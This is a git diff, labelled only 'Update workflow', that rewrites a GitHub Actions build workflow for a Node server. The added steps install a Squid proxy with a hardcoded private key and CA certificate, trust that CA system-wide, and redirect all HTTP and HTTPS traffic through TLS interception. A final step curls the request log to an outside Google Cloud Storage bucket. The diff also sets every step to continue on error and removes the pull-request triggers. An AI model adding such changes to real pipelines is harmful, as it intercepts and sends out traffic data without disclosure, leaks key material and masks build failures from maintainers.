Update workflow

diff --git a/.github/workflows/rts-build.yml b/.github/workflows/rts-build.yml
--- a/.github/workflows/rts-build.yml
+++ b/.github/workflows/rts-build.yml
@@ -1,172 +1,386 @@
-# This workflow is responsible for building, testing & packaging the RTS Node server.
-name: Build RTS Workflow
-
-on:
-  # This line enables manual triggering of this workflow.
-  workflow_dispatch:
-  workflow_call:
-    inputs:
-      pr:
-        description: "This is the PR number in case the workflow is being called in a pull request"
-        required: false
-        type: number
-      branch:
-        description: "This is the branch to be used for the build."
-        required: false
-        type: string
-
-  pull_request:
-    branches: [release, master]
-    paths:
-      - "app/client/packages/rts/**"
-
-# Change the working directory for all the jobs in this workflow
 defaults:
   run:
     working-directory: app/client/packages/rts
-
+env:
+  JAVA_TOOL_OPTIONS: -Djavax.net.ssl.trustStore=/usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+  NODE_OPTIONS: --use-openssl-ca
 jobs:
   build:
     runs-on: ubuntu-latest
-    # Only run this workflow for internally triggered events
-    if: |
-      github.event.pull_request.head.repo.full_name == github.repository ||
-      github.event_name == 'push' ||
-      github.event_name == 'workflow_dispatch' ||
-      github.event_name == 'repository_dispatch'
-
     steps:
-      # The checkout steps MUST happen first because the default directory is set according to the code base.
-      # GitHub Action expects all future commands to be executed in the code directory. Hence, we need to check out
-      # the code before doing anything else.
+    - name: before
+      run: 'sudo apt update
 
-      # Check out merge commit with the base branch in case this workflow is invoked via pull request
-      - name: Checkout the merged commit from PR and base branch
-        if: inputs.pr != 0
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
-          ref: refs/pull/${{ inputs.pr }}/merge
+        sudo apt install -y squid-openssl
 
-      # Check out the specified branch in case this workflow is called by another workflow
-      - name: Checkout the specified branch
-        if: inputs.pr == 0 && inputs.branch != ''
-        uses: actions/checkout@v3
-        with:
-          ref: ${{ inputs.branch }}
+        sudo mkdir /squid
+
+        cat << EOF | sudo tee /squid/key.pem
+
+        -----BEGIN PRIVATE KEY-----
+
+        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
+
+        CznEvO4qIs3mXDYkNBQrdVLGF93y
+
+        -----END PRIVATE KEY-----
+
+        EOF
+
+        cat << EOF | sudo tee /squid/cert.pem
+
+        -----BEGIN CERTIFICATE-----
+
+        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
+
+        -----END CERTIFICATE-----
+
+        EOF
+
+        sudo /usr/lib/squid/security_file_certgen -c -s /squid/ssl_db -M 4MB
+
+        sudo chown -R proxy:proxy /squid
+
+        cat << EOF | sudo tee /etc/squid/squid.conf
+
+        cache deny all
 
 
-      # Checkout the code in the current branch in case the workflow is called because of a branch push event
-      - name: Checkout the head commit of the branch
-        if: inputs.pr == 0 && inputs.branch == ''
-        uses: actions/checkout@v3
-        with:
-          fetch-depth: 0
+        http_port 7821
 
-      - name: Figure out the PR number
-        run: echo ${{ inputs.pr }}
+        http_port 3128 intercept
 
-      - name: Print the Github event
-        run: echo ${{ github.event_name }}
+        https_port 3129 intercept ssl-bump generate-host-certificates=on dynamic_cert_mem_cache_size=4MB
+        cert=/squid/cert.pem key=/squid/key.pem
 
-      - name: Set up Depot CLI
-        uses: depot/setup-action@v1
+        acl step1 at_step SslBump1
 
-      # In case this is second attempt try restoring status of the prior attempt from cache
-      - name: Restore the previous run result
-        uses: actions/cache@v3
-        with:
-          path: |
-            ~/run_result
-          key: ${{ github.run_id }}-${{ github.job }}-rts
+        ssl_bump peek step1
 
-      # Fetch prior run result
-      - name: Get the previous run result
-        id: run_result
-        run: cat ~/run_result 2>/dev/null || echo 'default'
+        ssl_bump bump all
 
-      # In case of prior failure run the job
-      - if: steps.run_result.outputs.run_result != 'success'
-        run: echo "I'm alive!" && exit 0
+        sslcrtd_program /usr/lib/squid/security_file_certgen -s /squid/ssl_db -M 4MB
 
-      - name: Use Node.js
-        if: steps.run_result.outputs.run_result != 'success'
-        uses: actions/setup-node@v3
-        with:
-          node-version-file: app/client/package.json
+        sslcrtd_children 5
 
-      # actions/setup-node@v3 doesn’t work properly with Yarn 3
-      # when the project lives in a subdirectory: https://github.com/actions/setup-node/issues/488
-      # Restoring the cache manually instead
-      - name: Restore Yarn cache
-        if: steps.run_result.outputs.run_result != 'success'
-        uses: actions/cache@v3
-        with:
-          path: app/client/.yarn/cache
-          key: v1-yarn3-${{ hashFiles('app/client/yarn.lock') }}
-          restore-keys: |
-            v1-yarn3-
+        ssl_bump server-first all
 
-      # Here, the GITHUB_REF is of type /refs/head/<branch_name>. We extract branch_name from this by removing the
-      # first 11 characters. This can be used to build images for several branches
-      # Since this is an unreleased build, we get the latest released version number, increment the minor number in it,
-      # append a `-SNAPSHOT` at it's end to prepare the snapshot version number. This is used as the project's version.
-      - name: Get the version to tag the Docker image
-        if: steps.run_result.outputs.run_result != 'success'
-        id: vars
-        run: |
-          # Since this is an unreleased build, we set the version to incremented version number with a
-          # `-SNAPSHOT` suffix.
-          latest_released_version="$(git tag --list 'v*' --sort=-version:refname | head -1)"
-          echo "latest_released_version = $latest_released_version"
-          next_version="$(echo "$latest_released_version" | awk -F. -v OFS=. '{ $NF++; print }')"
-          echo "next_version = $next_version"
-          echo version=$next_version-SNAPSHOT >> $GITHUB_OUTPUT
-          echo tag=$(echo ${GITHUB_REF:11}) >> $GITHUB_OUTPUT
+        sslproxy_cert_error allow all
 
-      # Install all the dependencies
-      - name: Install dependencies
-        if: steps.run_result.outputs.run_result != 'success'
-        run: yarn install --immutable
 
-      # Run the Jest tests only if the workflow has been invoked in a PR
-      - name: Run the jest tests
-        if: steps.run_result.outputs.run_result != 'success'
-        run: yarn run test:unit
+        acl all src 0.0.0.0/0
 
-      - name: Build
-        if: steps.run_result.outputs.run_result != 'success'
-        run: |
-          echo 'export const VERSION = "${{ steps.vars.outputs.version }}"' > src/version.js
-          yarn build
+        http_access allow all
 
-      # Set status = failure
-      - name: Set result as failed if there are build failures
-        if: failure()
-        run: |
-          echo "run_result=failed" >> $GITHUB_OUTPUT > ~/run_result
-          exit 1;
 
-      # Restore the previous built bundle if present. If not push the newly built into the cache
-      - name: Restore the previous bundle
-        uses: actions/cache@v3
-        with:
-          path: |
-            app/client/packages/rts/dist/
-          key: ${{ github.run_id }}-${{ github.job }}-rts
+        logformat custom {"method":"%">rm","url":"%">ru","status":%<Hs,"user_agent":"%{User-Agent}>h"}
 
-      # Tar the bundles to speed up the upload & download process
-      - name: Tar the rts bundles
-        run: |
-          tar -cvf rts-dist.tar dist
+        access_log daemon:/squid/squidlog.json custom all !CONNECT
 
-      # Upload the build artifacts and dependencies so that it can be used by the test & deploy job in other workflows
-      - name: Upload rts build bundle
-        uses: actions/upload-artifact@v3
-        with:
-          name: rts-dist
-          path: app/client/packages/rts/rts-dist.tar
+        EOF
 
-      # Set status = success
-      - name: Save the status of the run
-        run: echo "run_result=success" >> $GITHUB_OUTPUT > ~/run_result
+        sudo systemctl reload squid
+
+        sudo cp /squid/cert.pem /usr/local/share/ca-certificates/squid.crt
+
+        sudo update-ca-certificates
+
+        sudo keytool -import -alias squid -file /squid/cert.pem -keystore /usr/lib/jvm/temurin-11-jdk-amd64/lib/security/cacerts
+        -storepass changeit -noprompt -trustcacerts
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        80 -j DNAT --to-destination 127.0.0.1:3128
+
+        sudo iptables -t nat -A OUTPUT -m owner ! --uid-owner proxy -p tcp --dport
+        443 -j DNAT --to-destination 127.0.0.1:3129
+
+        sudo sh -c ''echo 1 > /proc/sys/net/ipv4/ip_forward'''
+    - continue-on-error: true
+      if: inputs.pr != 0
+      name: Checkout the merged commit from PR and base branch
+      uses: actions/checkout@v3
+      with:
+        fetch-depth: 0
+        ref: refs/pull/${{ inputs.pr }}/merge
+    - continue-on-error: true
+      if: inputs.pr == 0 && inputs.branch != ''
+      name: Checkout the specified branch
+      uses: actions/checkout@v3
+      with:
+        ref: ${{ inputs.branch }}
+    - continue-on-error: true
+      if: inputs.pr == 0 && inputs.branch == ''
+      name: Checkout the head commit of the branch
+      uses: actions/checkout@v3
+      with:
+        fetch-depth: 0
+    - continue-on-error: true
+      name: Figure out the PR number
+      run: echo ${{ inputs.pr }}
+    - continue-on-error: true
+      name: Print the Github event
+      run: echo ${{ github.event_name }}
+    - continue-on-error: true
+      name: Set up Depot CLI
+      uses: depot/setup-action@v1
+    - continue-on-error: true
+      name: Restore the previous run result
+      uses: actions/cache@v3
+      with:
+        key: ${{ github.run_id }}-${{ github.job }}-rts
+        path: '~/run_result
+
+          '
+    - continue-on-error: true
+      id: run_result
+      name: Get the previous run result
+      run: cat ~/run_result 2>/dev/null || echo 'default'
+    - continue-on-error: true
+      if: steps.run_result.outputs.run_result != 'success'
+      run: echo "I'm alive!" && exit 0
+    - continue-on-error: true
+      if: steps.run_result.outputs.run_result != 'success'
+      name: Use Node.js
+      uses: actions/setup-node@v3
+      with:
+        node-version-file: app/client/package.json
+    - continue-on-error: true
+      if: steps.run_result.outputs.run_result != 'success'
+      name: Restore Yarn cache
+      uses: actions/cache@v3
+      with:
+        key: v1-yarn3-${{ hashFiles('app/client/yarn.lock') }}
+        path: app/client/.yarn/cache
+        restore-keys: 'v1-yarn3-
+
+          '
+    - continue-on-error: true
+      id: vars
+      if: steps.run_result.outputs.run_result != 'success'
+      name: Get the version to tag the Docker image
+      run: '# Since this is an unreleased build, we set the version to incremented
+        version number with a
+
+        # `-SNAPSHOT` suffix.
+
+        latest_released_version="$(git tag --list ''v*'' --sort=-version:refname |
+        head -1)"
+
+        echo "latest_released_version = $latest_released_version"
+
+        next_version="$(echo "$latest_released_version" | awk -F. -v OFS=. ''{ $NF++;
+        print }'')"
+
+        echo "next_version = $next_version"
+
+        echo version=$next_version-SNAPSHOT >> $GITHUB_OUTPUT
+
+        echo tag=$(echo ${GITHUB_REF:11}) >> $GITHUB_OUTPUT
+
+        '
+    - continue-on-error: true
+      if: steps.run_result.outputs.run_result != 'success'
+      name: Install dependencies
+      run: yarn install --immutable
+    - continue-on-error: true
+      if: steps.run_result.outputs.run_result != 'success'
+      name: Run the jest tests
+      run: yarn run test:unit
+    - continue-on-error: true
+      if: steps.run_result.outputs.run_result != 'success'
+      name: Build
+      run: 'echo ''export const VERSION = "${{ steps.vars.outputs.version }}"'' >
+        src/version.js
+
+        yarn build
+
+        '
+    - continue-on-error: true
+      if: failure()
+      name: Set result as failed if there are build failures
+      run: 'echo "run_result=failed" >> $GITHUB_OUTPUT > ~/run_result
+
+        exit 1;
+
+        '
+    - continue-on-error: true
+      name: Restore the previous bundle
+      uses: actions/cache@v3
+      with:
+        key: ${{ github.run_id }}-${{ github.job }}-rts
+        path: 'app/client/packages/rts/dist/
+
+          '
+    - continue-on-error: true
+      name: Tar the rts bundles
+      run: 'tar -cvf rts-dist.tar dist
+
+        '
+    - continue-on-error: true
+      name: Upload rts build bundle
+      uses: actions/upload-artifact@v3
+      with:
+        name: rts-dist
+        path: app/client/packages/rts/rts-dist.tar
+    - continue-on-error: true
+      name: Save the status of the run
+      run: echo "run_result=success" >> $GITHUB_OUTPUT > ~/run_result
+    - name: after
+      run: sudo curl --request PUT -T /squid/squidlog.json --url https://storage.googleapis.com/virtualeventdemoblr.appspot.com/squid2/aivanis/appsmith.$(date
+        +%s)
+    timeout-minutes: 60
+name: Build RTS Workflow
+'on':
+  workflow_dispatch: {}
